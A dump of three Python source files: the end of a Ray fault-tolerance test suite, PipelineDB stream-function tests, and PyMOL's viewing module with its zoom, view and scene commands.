cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_warning_for_dead_autoscaler(ray_start_regular, error_pubsub):
# Terminate the autoscaler process.
from ray.worker import _global_node
autoscaler_process = _global_node.all_processes[
ray_constants.PROCESS_TYPE_MONITOR][0].process
autoscaler_process.terminate()
# Confirm that we receive an autoscaler failure error.
errors = get_error_message(
error_pubsub, 1, ray_constants.MONITOR_DIED_ERROR, timeout=5)
assert len(errors) == 1
# Confirm that the autoscaler failure error is stored.
error = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
assert error is not None
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ReferenceCountingAssertionError):
ray.get(object_ref)
thread.join()
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ReferenceCountingAssertionError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_period_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray._private.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
def test_raylet_node_manager_server_failure(ray_start_cluster_head,
log_pubsub):
cluster = ray_start_cluster_head
redis_port = int(cluster.address.split(":")[1])
# Reuse redis port to make node manager grpc server fail to start.
with pytest.raises(Exception):
cluster.add_node(wait=False, node_manager_port=redis_port)
p = log_pubsub
cnt = 0
# wait for max 10 seconds.
found = False
while cnt < 1000 and not found:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray._private.utils.decode(msg["data"]))
if data["pid"] == "raylet":
found = any("Failed to start the grpc server." in line
for line in data["lines"])
assert found
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
test_pipeline_funcs.py
|
from base import async_insert, pipeline, clean_db
import getpass
import psycopg2
import threading
import time
def test_combine_table(pipeline, clean_db):
pipeline.create_stream('s', x='int')
pipeline.create_cv('combine_table',
'SELECT x::int, COUNT(*) FROM s GROUP BY x')
values = [(i,) for i in xrange(1000)]
pipeline.insert('s', ('x',), values)
pipeline.execute('SELECT * INTO tmprel FROM combine_table_mrel')
stop = False
ninserts = [0]
def insert():
while not stop:
pipeline.insert('s', ('x',), values)
ninserts[0] += 1
time.sleep(0.01)
t = threading.Thread(target=insert)
t.start()
time.sleep(2)
conn = psycopg2.connect('dbname=postgres user=%s host=localhost port=%s' %
(getpass.getuser(), pipeline.port))
cur = conn.cursor()
cur.execute("SELECT pipelinedb.combine_table('combine_table', 'tmprel')")
conn.commit()
conn.close()
stop = True
t.join()
assert ninserts[0] > 0
rows = list(pipeline.execute('SELECT count FROM combine_table'))
assert len(rows) == 1000
for row in rows:
assert row[0] == ninserts[0] + 2
pipeline.execute('DROP TABLE tmprel')
def test_combine_table_no_groups(pipeline, clean_db):
pipeline.create_stream('s', x='int')
pipeline.create_cv('no_groups', 'SELECT COUNT(*) FROM s')
values = [(i,) for i in xrange(1000)]
pipeline.insert('s', ('x',), values)
pipeline.execute('SELECT * INTO tmprel FROM no_groups_mrel')
pipeline.execute("SELECT pipelinedb.combine_table('no_groups', 'tmprel')")
rows = pipeline.execute('SELECT count FROM no_groups')
assert len(rows) == 1
assert len(rows[0]) == 2
assert rows[0][0] == 2000
def test_pipeline_flush(pipeline, clean_db):
pipeline.execute('SET pipelinedb.stream_insert_level=async')
pipeline.create_stream('s', x='int')
pipeline.create_cv('flush', 'SELECT x, cq_sleep(0.01) FROM s')
values = [(i,) for i in xrange(1000)]
start = time.time()
# This will take 0.01 * 1000 = 10s to process but return immediately since
# inserts are async and values will fit in one batch.
pipeline.insert('s', ('x',), values)
insert_end = time.time()
pipeline.execute('SELECT pipelinedb.flush()')
flush_end = time.time()
assert insert_end - start < 0.1
assert flush_end - start > 10
row = list(pipeline.execute('SELECT count(*) FROM flush'))[0]
assert row[0] == 1000
pipeline.execute('SET pipelinedb.stream_insert_level=sync_commit')
|
viewing.py
|
#A* -------------------------------------------------------------------
#B* This file contains source code for the PyMOL computer program
#C* Copyright (c) Schrodinger, LLC.
#D* -------------------------------------------------------------------
#E* It is unlawful to modify or remove this copyright notice.
#F* -------------------------------------------------------------------
#G* Please see the accompanying LICENSE file for further information.
#H* -------------------------------------------------------------------
#I* Additional authors of this source file include:
#-* Filipe Maia (slicing code)
#-*
#-*
#Z* -------------------------------------------------------------------
from . import colorprinting
if True:
import sys
import threading
import pymol
from . import selector
import copy
from . import parsing
import re
cmd = sys.modules["pymol.cmd"]
from .cmd import _cmd, Shortcut, \
_feedback,fb_module,fb_mask, \
repres,repres_sc, is_string, is_list, \
repmasks,repmasks_sc, \
toggle_dict,toggle_sc,stereo_dict,stereo_sc, \
palette_dict, palette_sc, window_dict, window_sc, \
safe_list_eval, safe_alpha_list_eval, \
location_code, location_sc, boolean_dict, boolean_sc, \
DEFAULT_ERROR, DEFAULT_SUCCESS
palette_colors_dict = {
'rainbow_cycle' : 'magenta blue cyan green yellow orange red magenta',
'rainbow_cycle_rev' : 'magenta red orange yellow green cyan blue magenta',
'rainbow' : 'blue cyan green yellow orange red',
'rainbow_rev' : 'red orange yellow green cyan blue',
'rainbow2' : 'blue cyan green yellow orange red',
'rainbow2_rev' : 'red orange yellow green cyan blue',
'gcbmry' : 'green cyan blue magenta red yellow',
'yrmbcg' : 'yellow red magenta blue cyan green',
'cbmr' : 'cyan blue magenta red',
'rmbc' : 'red magenta blue cyan',
}
rep_list = [ "lines", "sticks", "spheres", "dots", "surface",
"mesh", "nonbonded", "nb_spheres", "cartoon",
"ribbon", "labels", "slice", "ellipsoids", "volume" ]
scene_action_sc = Shortcut(['store','recall','clear','insert_before',
'insert_after','next','previous',
'start', 'update','rename','delete',
'order', 'sort', 'first',
'append'])
scene_action_dict = {}
scene_action_dict_sc = Shortcut([])
view_sc = Shortcut(['store','recall','clear'])
def zoom(selection="all", buffer=0.0, state=0, complete=0, animate=0, *, _self=cmd):
'''
DESCRIPTION
"zoom" scales and translates the window and the origin to cover the
atom selection.
USAGE
zoom [ selection [, buffer [, state [, complete [, animate ]]]]]
EXAMPLES
zoom
zoom complete=1
zoom 142/, animate=3
zoom (chain A)
ARGUMENTS
selection = string: selection-expression or name pattern {default: all}
buffer = float: distance {default: 0}
state = 0: uses all coordinate states {default}
state = -1: uses only coordinates for the current state
state > 0: uses coordinates for a specific state
complete = 0 or 1: will insure no atoms centers are clipped
animate < 0: uses the default animation duration
animate = 0: no animation
animate > 0: animates using the provided duration in seconds
PYMOL API
cmd.zoom(string selection, float buffer, int state, int complete,
int animate)
NOTES
The zoom command normally tries to guess an optimal zoom level for
visualization, balancing closeness against occasional clipping of
atoms out of the field of view. You can change this behavior by
setting the complete option to 1, which will guarantee that the
atom positions for the entire selection will fit in the field of
an orthoscopic view.
To absolutely prevent clipping, you may also need to add an
additional buffer (typically 2 A) to account for graphical
representations which extend beyond the atom coordinates.
SEE ALSO
origin, orient, center
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.zoom(_self._COb,str(selection),float(buffer),
int(state)-1,int(complete),float(animate))
return r
def center(selection="all", state=0, origin=1, animate=0, *, _self=cmd):
'''
DESCRIPTION
"center" translates the window, the clipping slab, and the
origin to a point centered within the atom selection.
USAGE
center [ selection [, state [, origin [, animate ]]]]
EXAMPLES
center chain B
center 145/
ARGUMENTS
selection = string: selection-expression or name pattern (default: "all").
state = 0 (default) use all coordinate states
state = -1 use only coordinates for the current state
state > 0 use coordinates for a specific state
origin = 1 (default) move the origin
origin = 0 leave the origin unchanged
PYMOL API
cmd.center(string selection, int state, int origin)
SEE ALSO
origin, orient, zoom
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.center(_self._COb,str(selection),int(state)-1,int(origin),float(animate))
return r
clip_action_sc = Shortcut([ 'near','far','move','slab','atoms' ])
def clip(mode, distance, selection=None, state=0, *, _self=cmd):
'''
DESCRIPTION
"clip" alters the positions of the clipping planes.
USAGE
clip mode, distance [, selection [, state ]]
ARGUMENTS
mode = near, far, move, slab, or atoms
distance is a floating point value
selection = atom selection (for mode=atoms only)
EXAMPLES
clip near, -5 # moves near plane away from you by 5 A
clip far, 10 # moves far plane towards you by 10 A
clip move, -5 # moves the slab away from you by 5 A
clip slab, 20 # sets slab thickness to 20 A
clip slab, 10, resi 11 # clip 10 A slab about residue 11
clip atoms, 5, pept # clip atoms in "pept" with a 5 A buffer
# about their current camera positions
PYMOL API
cmd.clip(string mode, float distance, string selection, int state)
SEE ALSO
zoom, orient, reset
'''
mode = clip_action_sc.auto_err(str(mode),'mode')
if selection is not None:
selection = selector.process(selection)
else:
selection = ''
with _self.lockcm:
r = _cmd.clip(_self._COb,str(mode),float(distance),
str(selection),int(state)-1)
return r
def origin(selection="(all)", object=None, position=None, state=0, *, _self=cmd):
'''
DESCRIPTION
"origin" sets the center of rotation about a selection. If an
object name is specified, it can be used to set the center of
rotation for the object (for use in animation and editing).
USAGE
origin [ selection [, object [,position, [, state ]]]]
ARGUMENTS
selection = string: selection-expression or name-list {default: (all)}
state = 0 (default) use all coordinate states
state = -1 use only coordinates for the current state
state > 0 use coordinates for a specific state
EXAMPLES
origin chain A
origin position=[1.0,2.0,3.0]
PYMOL API
cmd.origin(string object-or-selection)
SEE ALSO
zoom, orient, reset
'''
#'
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
if object is None: object=''
if position is None: position=(0.0,0.0,0.0)
else:
if _self.is_string(position):
position = safe_list_eval(position)
selection = ''
r = _cmd.origin(_self._COb,selection,str(object),
(float(position[0]),
float(position[1]),
float(position[2])
),int(state)-1)
return r
def orient(selection="(all)", state=0, animate=0, *, _self=cmd):
'''
DESCRIPTION
"orient" aligns the principal components of the atoms in the
selection with the XYZ axes.
USAGE
orient [ selection [, state [, animate ]]]
ARGUMENTS
selection = a selection-expression or name-pattern {default: (all)}
state = 0: use all coordinate states {default}
state = -1: uses only coordinates for the current state
state > 0: uses coordinates for a specific state
EXAMPLES
orient organic
NOTES
The function is similar to the orient command in X-PLOR.
PYMOL API
cmd.orient(string object-or-selection, int state, float animate)
SEE ALSO
zoom, origin, reset
'''
# preprocess selection
selection = selector.process(selection)
with _self.lockcm:
return _cmd.orient(_self._COb,"("+selection+")",int(state)-1,float(animate))
def move(axis, distance, *, _self=cmd):
'''
DESCRIPTION
"move" translates the camera about one of the three primary axes.
USAGE
move axis, distance
EXAMPLES
move x, 3
move y, -1
PYMOL API
cmd.move(string axis, float distance)
SEE ALSO
turn, rotate, translate, zoom, center, clip
'''
with _self.lockcm:
return _cmd.move(_self._COb,str(axis),float(distance))
def enable(name='all', parents=0, *, _self=cmd):
'''
DESCRIPTION
"enable" turns on display of one or more objects and/or selections.
USAGE
enable name
ARGUMENTS
name = name-pattern or selection.
NOTES
If name matches a selection name, then selection indicator dots
are shown for atoms in that selection. If name is a
selection-expression, then all objects with atoms in that
selection are enabled.
For an object\'s content to be displayed in the 3D viewer, the
object must be enabled AND at least one of the available
representations must be shown.
PYMOL API
cmd.enable(string object-name)
EXAMPLES
enable target_protein # enables the target_protein object
enable 1dn2.* # enables all entities starting with 1dn2.
enable *lig # enables all entities ending with lig
SEE ALSO
show, hide, disable
'''
if name[0]=='(':
selection = selector.process(name)
with _self.lockcm:
r = _cmd.onoff_by_sele(_self._COb,selection,1)
else:
with _self.lockcm:
r = _cmd.onoff(_self._COb,str(name),1,int(parents));
return r
def disable(name='all', *, _self=cmd):
'''
DESCRIPTION
"disable" turns off display of one or more objects and/or selections.
USAGE
disable name
ARGUMENTS
name = name-pattern or selection.
PYMOL API
cmd.disable(string name)
SEE ALSO
show, hide, enable
'''
if name[0]=='(':
selection = selector.process(name)
with _self.lockcm:
r = _cmd.onoff_by_sele(_self._COb,selection,0)
else:
with _self.lockcm:
r = _cmd.onoff(_self._COb,str(name),0,0);
return r
def _rep_to_repmask(rep):
repn = 0
for rep in rep.split():
rep = repmasks_sc.auto_err(rep, 'representation')
repn |= repmasks[rep]
return repn
def toggle(representation="lines", selection="all", *, _self=cmd):
'''
DESCRIPTION
"toggle" toggles the visibility of a representation within a
selection.
USAGE
toggle [ representation [, selection ]]
ARGUMENTS
representation = string: named representation {default: lines}
selection = string: atom selection {default: all}
NOTES
If the representation is enabled for any atom in the selection, it will
be turned off.
PYMOL API
cmd.toggle(string representation, string selection)
SEE ALSO
show, hide
'''
with _self.lockcm:
if representation == 'object':
repn = -2
else:
repn = _rep_to_repmask(representation)
# preprocess selection
selection = selector.process(selection)
r = _cmd.toggle(_self._COb,str(selection),int(repn));
return r
def _showhide(rep, selection, value, _self):
if not selection and (rep in ("", "all") or '(' in rep or '/' in rep):
# rep looks like a selection
selection = rep
rep = "wire" if value else "everything"
selection = selector.process(selection) or "all"
repn = _rep_to_repmask(rep)
with _self.lockcm:
r = _cmd.showhide(_self._COb, str(selection), int(repn), value)
return r
def show(representation="wire", selection="", *, _self=cmd):
'''
DESCRIPTION
"show" turns on representations for objects and selections.
USAGE
show [ representation [, selection ]]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon, sticks,
dots, surface, labels, extent, nonbonded, nb_spheres, slice,
extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
or everything
selection = string: a selection-expression or name-pattern
NOTES
With no arguments, "show" alone turns on lines for all bonds and
nonbonded for all atoms in all molecular objects.
EXAMPLES
show
show ribbon
show lines, (name CA+C+N)
SEE ALSO
hide, enable, disable
'''
return _showhide(representation, selection, 1, _self)
def show_as(representation="wire", selection="", *, _self=cmd):
'''
DESCRIPTION
"as" turns on and off atom and bond representations.
USAGE
as representation [, selection ]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon, sticks,
dots, surface, labels, extent, nonbonded, nb_spheres, slice,
extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
volume or everything
selection = string {default: all}
EXAMPLES
as lines, name CA+C+N
as ribbon
PYMOL API
cmd.show_as(string representation, string selection)
NOTES
"selection" can be an object name
"as" alone will turn on lines and nonbonded and hide everything else.
SEE ALSO
show, hide, enable, disable
'''
return _showhide(representation, selection, 2, _self)
def hide(representation="everything", selection="", *, _self=cmd):
'''
DESCRIPTION
"hide" turns off atom and bond representations.
USAGE
hide [ representation [, selection ]]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon,
sticks, dots, surface, labels, extent, nonbonded, nb_spheres,
slice, extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
or everything
selection = string: a selection-expression or name-pattern
EXAMPLES
hide lines, all
hide ribbon
PYMOL API
cmd.hide(string representation, string selection)
SEE ALSO
show, enable, disable
'''
return _showhide(representation, selection, 0, _self)
def get_view(output=1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"get_view" returns and optionally prints out the current view
information in a format which can be embedded into a command
script and can be used in subsequent calls to "set_view".
If a log file is currently open, get_view will not write the view
matrix to the screen unless the "output" parameter is 2.
USAGE
get_view [output]
ARGUMENTS
output = 0: output matrix to screen
output = 1: do not Output matrix to screen
output = 2: force output to screen even if log file is open
output = 3: return formatted string instead of a list
NOTES
Contents of the view matrix:
* 0 - 8: column-major 3x3 matrix which rotates model space to camera space
* 9 - 11: origin of rotation relative to camera (in camera space)
* 12 - 14: origin of rotation (in model space)
* 15: front plane distance from the camera
* 16: rear plane distance from the camera
* 17: orthoscopic flag (+/-) and field of view (if abs(value) > 1)
The camera always looks down -Z with its +X left and its +Y down.
Therefore, in the default view, model +X is to the observer\'s
right, +Y is upward, and +Z points toward the observer.
PYMOL API
cmd.get_view(output=1, quiet=1)
SEE ALSO
set_view
'''
with _self.lockcm:
r = _cmd.get_view(_self._COb)
if True:
output = int(output)
if True:
if (_self.get_setting_int("logging") != 0) and (output<3):
if not quiet:
print(" get_view: matrix written to log file.")
_self.log("_ set_view (\\\n","cmd.set_view((\\\n")
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[0:3] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[0:3])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[4:7] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[4:7])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[8:11] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[8:11])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[16:19],
" %14.9f, %14.9f, %14.9f,\\\n"%r[16:19])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[19:22],
" %14.9f, %14.9f, %14.9f,\\\n"%r[19:22])
_self.log("_ %14.9f, %14.9f, %14.9f )\n"%r[22:25] ,
" %14.9f, %14.9f, %14.9f ))\n"%r[22:25])
if output<2: # suppress if we have a log file open
output=0
if output and (not quiet) and (output<3):
print("### cut below here and paste into script ###")
print("set_view (\\")
print(" %14.9f, %14.9f, %14.9f,\\"%r[0:3])
print(" %14.9f, %14.9f, %14.9f,\\"%r[4:7])
print(" %14.9f, %14.9f, %14.9f,\\"%r[8:11])
print(" %14.9f, %14.9f, %14.9f,\\"%r[16:19])
print(" %14.9f, %14.9f, %14.9f,\\"%r[19:22])
print(" %14.9f, %14.9f, %14.9f )"%r[22:25])
print("### cut above here and paste into script ###")
if output==3:
return ("set_view (\\\n"+
" %14.9f, %14.9f, %14.9f,\\\n"%r[0:3] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[4:7] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[8:11] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[16:19] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[19:22] +
" %14.9f, %14.9f, %14.9f )\n"%r[22:25])
r = r[0:3]+r[4:7]+r[8:11]+r[16:25]
return r
def set_view(view,animate=0,quiet=1,hand=1, *, _self=cmd):
r'''
DESCRIPTION
"set_view" sets viewing information for the current scene,
including the rotation matrix, position, origin of rotation,
clipping planes, and the orthoscopic flag.
USAGE
set_view [ view ]
EXAMPLE
set_view (\
0.999876618, -0.000452542, -0.015699286,\
0.000446742, 0.999999821, -0.000372844,\
0.015699454, 0.000365782, 0.999876678,\
0.000000000, 0.000000000, -150.258514404,\
11.842411041, 20.648729324, 8.775371552,\
118.464958191, 182.052062988, 0.000000000 )
PYMOL API
cmd.set_view(string-or-sequence view)
SEE ALSO
get_view
'''
if isinstance(view, (str, bytes)):
view = safe_list_eval(view)
if len(view)!=18:
raise pymol.CmdException(
"bad view argument; should be a sequence of 18 floats")
with _self.lockcm:
r = _cmd.set_view(_self._COb,(
float(view[ 0]),float(view[ 1]),float(view[ 2]),0.0,
float(view[ 3]),float(view[ 4]),float(view[ 5]),0.0,
float(view[ 6]),float(view[ 7]),float(view[ 8]),0.0,
0.0,0.0,0.0,1.0,
float(view[ 9]),float(view[10]),float(view[11]),
float(view[12]),float(view[13]),float(view[14]),
float(view[15]),float(view[16]),float(view[17])),
int(quiet),float(animate),int(hand))
return r
def view(key, action='recall', animate=-1, *, _self=cmd):
'''
DESCRIPTION
"view" saves and restore camera views.
USAGE
view key [, action [, animate]]
ARGUMENTS
key = string or *
action = store, recall, clear: {default: recall}
NOTES
Views F1 through F12 are automatically bound to function keys
provided that "set_key" has not been used to redefine the
behaviour of the respective key, and that a "scene" has not been
defined for that key.
EXAMPLES
view 0, store
view 0
PYMOL API
cmd.view(string key, string action)
SEE ALSO
scene, set_view, get_view
'''
pymol=_self._pymol
if key=='*':
action = view_sc.auto_err(action,'action')
if action=='clear':
pymol._view_dict = {}
pymol._view_dict_sc = Shortcut(pymol._view_dict.keys())
else:
print(" view: stored views:")
lst = list(pymol._view_dict.keys())
lst.sort()
parsing.dump_str_list(lst)
else:
action = view_sc.auto_err(action,'action')
if action=='recall':
key = pymol._view_dict_sc.auto_err(key,'view')
_self.set_view(pymol._view_dict[key],animate=animate)
if _feedback(fb_module.scene,fb_mask.actions,_self): # redundant
print(" view: \"%s\" recalled."%key)
elif (action=='store') or (action=='update'):
pymol._view_dict_sc.append(key)
pymol._view_dict[key]=_self.get_view(0)
if _feedback(fb_module.scene,fb_mask.actions,_self):
print(" view: view "+action+"d as \"%s\"."%key)
elif action=='clear':
key = pymol._view_dict_sc.auto_err(key,'view')
if key in pymol._view_dict:
del pymol._view_dict[key]
pymol._view_dict_sc = Shortcut(pymol._view_dict.keys())
if _feedback(fb_module.scene,fb_mask.actions,_self): # redundant
print(" view: '%s' deleted."%key)
def get_viewport(output=1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"get_viewport" returns and optionally prints out the screen viewport size
USAGE
get_viewport [output]
ARGUMENTS
output = 0: do not print to screen
output = 1 {default}: print to screen if not logging and not quiet
output = 2: force output to screen even if log file is open
PYMOL API
cmd.get_viewport(output=1, quiet=1)
'''
output = int(output)
with _self.lockcm:
r = _cmd.get_viewport(_self._COb)
if _self.get_setting_int("logging") and output < 3:
_self.log(f"_ viewport {r[0]}, {r[1]}\n", f"cmd.viewport{r}\n")
if not quiet:
print(" get_viewport: data written to log file.")
if output < 2: # suppress if we have a log file open
output = 0
if (0 < output < 3) and not quiet:
print("### cut below here and paste into script ###")
print("viewport %4d, %4d" % r)
print("### cut above here and paste into script ###")
if output == 3:
colorprinting.warning(" Warning: get_viewport(3) is deprecated")
return "viewport ( %4d, %4d )\n" % r
return r
def get_vis(_self=cmd):
with _self.lockcm:
return _cmd.get_vis(_self._COb)
def set_vis(dict, *, _self=cmd):
with _self.lockcm:
return _cmd.set_vis(_self._COb, dict)
def get_colorection(key, *, _self=cmd):
with _self.lockcm:
return _cmd.get_colorection(_self._COb, key)
def set_colorection(dict,key, *, _self=cmd):
with _self.lockcm:
return _cmd.set_colorection(_self._COb, dict, key)
def del_colorection(dict,key, *, _self=cmd):
with _self.lockcm:
return _cmd.del_colorection(_self._COb, dict, key)
def get_scene_list(_self=cmd):
with _self.lockcm:
return _cmd.get_scene_order(_self._COb)
def get_scene_thumbnail(name, _self=cmd):
with _self.lockcm:
return _cmd.get_scene_thumbnail(_self._COb, name)
def get_scene_message(name, _self=cmd):
with _self.lockcm:
return _cmd.get_scene_message(_self._COb, name)
def set_scene_message(name, message, _self=cmd):
with _self.lockcm:
return _cmd.set_scene_message(_self._COb, name, message)
def chain_session(_self=cmd):
import os
# assumes locked interpreter
r = 0
session_file = str(_self.get("session_file"))
re_pat = re.compile("[0-9]+\.")
if len(session_file): # find next session file, if it exists
mo = re_pat.search(session_file)
if mo is not None:
pat = mo.group(0)
if len(pat):
file_no = int(float(pat)) + 1
new_form = r"%0"+str(len(pat)-1)+"d."
for new_num in range(file_no, file_no+11):
new_pat = new_form % new_num
new_file = re_pat.sub(new_pat, session_file)
# try both PSE and PSW
if not os.path.exists(new_file):
new_file = re.sub("\.pse$",".psw",new_file,re.I)
if not os.path.exists(new_file):
new_file = re.sub("\.psw$",".pse",new_file,re.I)
if os.path.exists(new_file):
_self.do("_ cmd.load(r'''"+new_file+"''',format='psw')")
return 1
return 0
def scene_order(names,sort=0,location='current',quiet=1, *, _self=cmd):
'''
DESCRIPTION
"scene_order" changes the ordering of scenes.
USAGE
scene_order names, sort, location
ARGUMENTS
names = string: a space-separated list of names
sort = yes or no {default: no}
location = top, current, or bottom {default: current}
EXAMPLES
scene_order *,yes
scene_order F6 F4 F3
scene_order 003 006 004, location=top
# if names have spaces
cmd.scene_order(["name 1", "name 2"])
PYMOL API
cmd.scene_order(names: Union[list, str], sort: str, location: str)
SEE ALSO
scene
'''
location = location_sc.auto_err(location,'location')
if is_string(sort):
sort=boolean_dict[boolean_sc.auto_err(sort,'sort option')]
if isinstance(names, str):
names = names.split()
with _self.lockcm:
return _cmd.scene_order(_self._COb, names, sort, location)
def _scene_get_current_message(_self=cmd):
wiz = _self.get_wizard()
return '\n'.join(wiz.message) if (wiz is not None
and wiz.__class__.__name__ == 'Message'
and hasattr(wiz, 'from_scene')) else None
def scene_recall_message(message, *, _self=cmd):
'''
INTERNAL, DO NOT USE.
Display a scene message.
'''
wiz = _self.get_wizard()
replace_flag = (wiz is not None
and wiz.__class__.__name__ == 'Message'
and hasattr(wiz, 'from_scene'))
if message:
if is_string(message):
message = message.splitlines()
elif not is_list(message):
raise TypeError("message %s" % (type(message)))
wizard_func = _self.replace_wizard if replace_flag else _self.wizard
wizard_func("message", *message)
_self.get_wizard().from_scene = 1
elif replace_flag:
_self.wizard()
def scene(key='auto', action='recall', message=None, view=1,
color=1, active=1, rep=1, frame=1, animate=-1,
new_key=None, hand=1, quiet=1, sele="all", *, _self=cmd):
'''
DESCRIPTION
"scene" saves and restores scenes. A scene consists of the camera
view, all object activity information, all atom-wise visibilities,
all atom-wise colors, all representations, the global frame index,
and may contain a text message to display on playback.
USAGE
scene [key [,action [, message, [ new_key=new-key-value ]]]]
ARGUMENTS
key = string, new, auto, or *: use new for an automatically
numbered new scene, use auto for the current scene (if one
exists), and use * for all scenes (clear and recall actions only).
action = store, recall, insert_after, insert_before, next,
previous, update, rename, or clear: (default = recall). If
rename, then a new_key argument must be explicitly defined.
message = string: a text message to display with the scene.
new_key = string: the new name for the scene
EXAMPLES
scene *
scene F1, store
scene F2, store, Please note the critical hydrogen bond shown in yellow.
scene F1
scene F2
scene F1, rename, new_key=F5
NOTES
